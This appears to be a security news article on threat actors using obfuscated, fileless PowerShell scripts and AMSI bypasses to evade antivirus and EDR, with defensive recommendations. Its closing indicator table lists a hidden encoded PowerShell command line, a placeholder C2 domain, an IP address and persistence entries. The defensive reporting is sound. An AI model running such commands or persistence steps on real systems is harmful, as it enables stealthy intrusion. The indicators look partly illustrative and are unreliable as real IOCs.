Cybersecurity researchers have uncovered a recent wave of attacks in which threat actors are leveraging Microsoft PowerShell to stealthily bypass both traditional antivirus (AV) and advanced Endpoint Detection and Response (EDR) solutions.
The attackers’ approach demonstrates the increasing prevalence and sophistication of so called “living-off-the-land” techniques, which rely on native system utilities to carry out malicious actions while blending seamlessly with legitimate processes.
Attackers Leverage Living-off-the-Land Techniques
The attackers employ highly obfuscated PowerShell scripts that are executed directly in memory, thereby minimizing their footprint on disk and evading signature-based detection mechanisms.
According to the Report, these PowerShell payloads are often delivered via spear-phishing emails, malicious macros, or weaponized documents that exploit unpatched vulnerabilities in commonly used software.
Once executed, the scripts utilize advanced obfuscation strategies, including dynamic variable naming, encoding, and heavy use of built-in PowerShell cmdlets for decoding and execution.
This complexity makes static and heuristic analysis by AV and EDR tools significantly more challenging.
The attackers further complicate detection by leveraging “fileless” malware payloads, executing all actions in system memory, and avoiding the creation of traditional artifacts that would normally trigger security alerts.
Researchers have observed the adversaries using PowerShell to download and execute secondary payloads, establish persistence, and exfiltrate sensitive information to remote command-and-control (C2) servers.
Notably, the malicious scripts often invoke Windows Management Instrumentation (WMI), scheduled tasks, or registry modifications to ensure ongoing access even after system reboots.
This persistence, combined with lateral movement capabilities, enables attackers to silently expand their foothold within targeted networks.
Obfuscation Bypasses Security Controls
These campaigns are notable for their ability to bypass leading EDR solutions.
Attackers are leveraging newly discovered techniques to disable security telemetry or tamper with agent processes, further reducing the likelihood of detection.
In some cases, attackers employ “AMSI bypass” methods specifically targeting the Antimalware Scan Interface (AMSI) which is designed by Microsoft to assist antivirus and EDR products in scanning scripts in real time.
By patching or disabling AMSI functions at runtime, malicious scripts can evade thorough inspection.
Security experts emphasize that these attacks highlight the critical need for a defense-in-depth approach that includes behavioral analytics, continuous monitoring, and robust endpoint hardening.
Organizations are advised to restrict PowerShell execution through Group Policy, enforce code signing, and leverage application whitelisting.
Security teams should also monitor for anomalous PowerShell activity, such as unusual process chains, unexpected network connections, and large volumes of outbound data.
Given the ongoing evolution of attacker tactics-particularly the abuse of trusted Windows components cybersecurity defenders must remain vigilant and continuously adapt their detection and response strategies.
Close collaboration between blue teams, threat hunters, and incident responders is essential to counteract this rapidly developing threat landscape.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| File Hash | e5b6a1c2f9d3a6ef7c3b1a2d4e1f2b5c | Obfuscated PowerShell script payload |
| Command Line | powershell -nop -w hidden -enc ... | Encoded PowerShell command for fileless attack |
| Domain | malicious-c2[.]example[.]com | C2 server used for data exfiltration |
| IP Address | 185.220.101.35 | Known malicious endpoint linked to campaign |
| Registry Key | HKCU\Software\Microsoft\Windows\Run\Updater | Persistence mechanism registry entry |
| Scheduled Task | \Windows\UpdateTask | Malicious scheduled task for script execution |
| User-Agent String | Mozilla/5.0 (PowerShell) | Unusual user-agent observed in C2 communication |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
